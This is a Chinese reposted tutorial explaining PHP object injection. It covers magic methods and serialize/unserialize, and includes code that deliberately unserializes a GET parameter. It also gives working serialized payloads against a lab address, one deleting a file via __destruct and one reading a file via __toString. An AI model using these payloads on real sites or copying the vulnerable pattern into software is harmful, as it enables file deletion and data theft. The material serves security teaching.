理解php反序列化漏洞

Posted 网络空间安全社

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了理解php反序列化漏洞相关的知识,希望对你有一定的参考价值。

点上方蓝字“网络空间安全社”即可关注

2018/11/3  10:34



链接:https://securitycafe.ro/2015/01/05/understanding-php-object-injection/

译文链接:https://blog.csdn.net/qq_32400847/article/details/53873275

(本篇为转载CSDN上译者的博客,方便大家理解php的序列化以及反序列化。)




php对象注入是一个非常常见的漏洞,这个类型的漏洞虽然有些难以利用,但仍旧非常危险。为了理解这个漏洞,请读者具备基础的php知识。类和变量是非常容易理解的php概念。举个例子,1.php在一个类中定义了一个变量和一个方法。它创建了一个对象并且调用了PrintVariable函数,该函数会输出变量variable。

 
   
  1. <?php  

  2. class TestClass  

  3. {

  4. // 一个变量  

  5. public $variable = 'This is a string';

  6. // 一个简单的方法  

  7. public function PrintVariable()  

  8. {

  9. echo $this->variable;

  10. }

  11. }

  12. // 创建一个对象  

  13. $object = new TestClass();

  14. // 调用一个方法  

  15. $object->PrintVariable();

  16. ?>


php类可能会包含一些特殊的函数叫magic函数,magic函数命名是以符号__开头的,比如 __construct, __destruct, __toString, __sleep, __wakeup等等。这些函数在某些情况下会自动调用,比如__construct当一个对象创建时被调用,__destruct当一个对象销毁时被调用,__toString当一个对象被当作一个字符串使用。为了更好的理解magic方法是如何工作的,在2.php中增加了三个magic方法,__construct, __destruct和__toString。可以看出,__construct在对象创建时调用,__destruct在php脚本结束时调用,__toString在对象被当作一个字符串使用时调用。

 
   
  1. <?php  

  2. class TestClass  

  3. {

  4. // 一个变量  

  5. public $variable = 'This is a string';

  6. // 一个简单的方法  

  7. public function PrintVariable()  

  8. {

  9. echo $this->variable . '<br />';

  10. }

  11. // Constructor  

  12. public function __construct()  

  13. {

  14. echo '__construct <br />';

  15. }

  16. // Destructor  

  17. public function __destruct()  

  18. {

  19. echo '__destruct <br />';

  20. }

  21. // Call  

  22. public function __toString()  

  23. {

  24. return '__toString<br />';

  25. }

  26. }

  27. // 创建一个对象  

  28. //  __construct会被调用  

  29. $object = new TestClass();

  30. // 创建一个方法  

  31. $object->PrintVariable();

  32. // 对象被当作一个字符串  

  33. //  __toString会被调用  

  34. echo $object;

  35. // End of PHP script  

  36. // 脚本结束__destruct会被调用  

  37. ?>

理解php反序列化漏洞

php允许保存一个对象方便以后重用,这个过程被称为序列化。为什么要有序列化这种机制呢?在传递变量的过程中,有可能遇到变量值要跨脚本文件传递的过程。试想,如果为一个脚本中想要调用之前一个脚本的变量,但是前一个脚本已经执行完毕,所有的变量和内容释放掉了,我们要如何操作呢?难道要前一个脚本不断的循环,等待后面脚本调用?这肯定是不现实的。serialize和unserialize就是用来解决这一问题的。serialize可以将变量转换为字符串并且在转换中可以保存当前变量的值;unserialize则可以将serialize生成的字符串变换回变量。让我们在3.php中添加序列化的例子,看看php对象序列化之后的格式。

 
   
  1. <?php  

  2. // 某类  

  3. class User  

  4. {

  5. // 类数据  

  6. public $age = 0;

  7. public $name = '';

  8. // 输出数据  

  9. public function PrintData()  

  10. {

  11. echo 'User ' . $this->name . ' is ' . $this->age

  12. . ' years old. <br />';

  13. }

  14. }

  15. // 创建一个对象  

  16. $usr = new User();

  17. // 设置数据  

  18. $usr->age = 20;

  19. $usr->name = 'John';

  20. // 输出数据  

  21. $usr->PrintData();

  22. // 输出序列化之后的数据  

  23. echo serialize($usr);

  24. ?>

理解php反序列化漏洞

为了使用这个对象,在4.php中用unserialize重建对象。

 
   
  1. <?php  

  2. // 某类  

  3. class User  

  4. {

  5. // Class data  

  6. public $age = 0;

  7. public $name = '';

  8. // Print data  

  9. public function PrintData()  

  10. {

  11. echo 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';

  12. }

  13. }

  14. // 重建对象  

  15. $usr = unserialize('O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";}');

  16. // 调用PrintData 输出数据  

  17. $usr->PrintData();

  18. ?>

理解php反序列化漏洞

magic函数__construct和__destruct会在对象创建或者销毁时自动调用;__sleep magic方法在一个对象被序列化的时候调用;__wakeup magic方法在一个对象被反序列化的时候调用。在5.php中添加这几个magic函数的例子。

 
   
  1. <?php  

  2. class Test  

  3. {

  4. public $variable = 'BUZZ';

  5. public $variable2 = 'OTHER';

  6. public function PrintVariable()  

  7. {

  8. echo $this->variable . '<br />';

  9. }

  10. public function __construct()  

  11. {

  12. echo '__construct<br />';

  13. }

  14. public function __destruct()  

  15. {

  16. echo '__destruct<br />';

  17. }

  18. public function __wakeup()  

  19. {

  20. echo '__wakeup<br />';

  21. }

  22. public function __sleep()  

  23. {

  24. echo '__sleep<br />';

  25. return array('variable', 'variable2');

  26. }

  27. }

  28. // 创建对象调用__construct

  29. $obj = new Test();

  30. // 序列化对象调用__sleep  

  31. $serialized = serialize($obj);

  32. // 输出序列化后的字符串  

  33. print 'Serialized: ' . $serialized . '<br />';

  34. // 重建对象调用__wakeup  

  35. $obj2 = unserialize($serialized);

  36. // 调用PintVariable输出数据

  37. $obj2->PrintVariable();

  38. // 脚本结束调用__destruct  

  39. ?>

理解php反序列化漏洞
现在我们了解序列化是如何工作的,但是我们如何利用它呢?有多种可能的方法,取决于应用程序、可用的类和magic函数。记住,序列化对象包含攻击者控制的对象值。你可能在Web应用程序源代码中找到一个定义__wakeup或__destruct的类,这些函数会影响Web应用程序。例如,我们可能会找到一个临时将日志存储到文件中的类。当销毁时对象可能不再需要日志文件并将其删除。把下面这段代码保存为logfile.php。

 
   
  1. <?php  

  2. class LogFile  

  3. {

  4. // log文件名  

  5. public $filename = 'error.log';

  6. // 储存日志文件  

  7. public function LogData($text)  

  8. {

  9. echo 'Log some data: ' . $text . '<br />';

  10. file_put_contents($this->filename, $text, FILE_APPEND);

  11. }

  12. // 删除日志文件  

  13. public function __destruct()  

  14. {

  15. echo '__destruct deletes "' . $this->filename . '" file. <br />';

  16. unlink(dirname(__FILE__) . '/' . $this->filename);

  17. }

  18. }

  19. ?>

这是一个使用它的例子。

 
   
  1. <?php  

  2. include 'logfile.php';

  3. // 创建一个对象  

  4. $obj = new LogFile();

  5. // 设置文件名和要储存的日志数据  

  6. $obj->filename = 'somefile.log';

  7. $obj->LogData('Test');

  8. // 脚本结束__destruct被调用somefile.log文件被删除

  9. ?>

在其它脚本中我们可能找到一个unserialize的调用,并且参数是用户提供的。把下面这段代码保存为test.php。

 
   
  1. <?php  

  2. include 'logfile.php';

  3. // ... 一些使用LogFile类的代码...  

  4. // 简单的类定义  

  5. class User  

  6. {

  7. // 类数据  

  8. public $age = 0;

  9. public $name = '';

  10. // 输出数据  

  11. public function PrintData()  

  12. {

  13. echo 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';

  14. }

  15. }

  16. // 重建用户输入的数据  

  17. $usr = unserialize($_GET['usr_serialized']);

  18. ?>

创建利用代码111.php。

 
   
  1. <?php  

  2. include 'logfile.php';

  3. $obj = new LogFile();

  4. $obj->filename = '1.php';

  5. echo serialize($obj) . '<br />';

  6. ?>

理解php反序列化漏洞

访问http://192.168.153.138/test.php?usr_serialized=O:7:"LogFile":1:{s:8:"filename";s:5:"1.php";}。

理解php反序列化漏洞

显示已经删除了1.php。验证一下,果然成功删除了。

理解php反序列化漏洞

这就是漏洞名称的由来:在变量可控并且进行了unserialize操作的地方注入序列化对象,实现代码执行或者其它坑爹的行为。先不谈 __wakeup 和 __destruct,还有一些很常见的注入点允许你利用这个类型的漏洞,一切都是取决于程序逻辑。举个例子,某用户类定义了一个__toString为了让应用程序能够将类作为一个字符串输出(echo $obj),而且其他类也可能定义了一个类允许__toString读取某个文件。把下面这段代码保存为test.php。

 
   
  1. <?php  

  2. // … 一些include ...  

  3. class FileClass  

  4. {

  5. // 文件名  

  6. public $filename = 'error.log';

  7. // 当对象被作为一个字符串会读取这个文件  

  8. public function __toString()  

  9. {

  10. return file_get_contents($this->filename);

  11. }

  12. }

  13. // Main User class  

  14. class User  

  15. {

  16. // Class data  

  17. public $age = 0;

  18. public $name = '';

  19. // 允许对象作为一个字符串输出上面的data  

  20. public function __toString()  

  21. {

  22. return 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';

  23. }

  24. }

  25. // 用户可控  

  26. $obj = unserialize($_GET['usr_serialized']);

  27. // 输出__toString  

  28. echo $obj;

  29. ?>

访问http://192.168.153.138/test.php?usr_serialized=O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";}。

理解php反序列化漏洞


但是如果我们用序列化调用FileClass呢?先建立一个1.txt。

理解php反序列化漏洞

创建利用代码123.php。

 
   
  1. <?php  

  2. include 'test.php';

  3. $fileobj = new FileClass();

  4. $fileobj->filename = '1.txt';

  5. echo serialize($fileobj);

  6. ?>

理解php反序列化漏洞

访问http://192.168.153.138/test.php?usr_serialized=O:9:"FileClass":1:{s:8:"filename";s:5:"1.txt";}。

成功显示了文本内容。也可以使用其他magic函数:如果对象将调用一个不存在的函数__call将被调用;如果对象试图访问不存在的类变量__get和__set将被调用。但是利用这种漏洞并不局限于magic函数,在普通的函数上也可以采取相同的思路。例如User类可能定义一个get方法来查找和打印一些用户数据,但是其他类可能定义一个从数据库获取数据的get方法,这从而会导致SQL注入漏洞。set或write方法会将数据写入任意文件,可以利用它获得远程代码执行。唯一的技术问题是注入点可用的类,但是一些框架或脚本具有自动加载的功能。最大的问题在于人:理解应用程序以能够利用这种类型的漏洞,因为它可能需要大量的时间来阅读和理解代码。



链接:https://securitycafe.ro/2015/01/05/understanding-php-object-injection/

译文链接:https://blog.csdn.net/qq_32400847/article/details/53873275



以上是关于理解php反序列化漏洞的主要内容,如果未能解决你的问题,请参考以下文章

由Typecho 深入理解PHP反序列化漏洞

理解php反序列化漏洞

四个实例递进php反序列化漏洞理解

PHP反序列化漏洞代码审计—学习资料

一篇文章带你理解漏洞之 Python 反序列化漏洞!

PHP内核层解析反序列化漏洞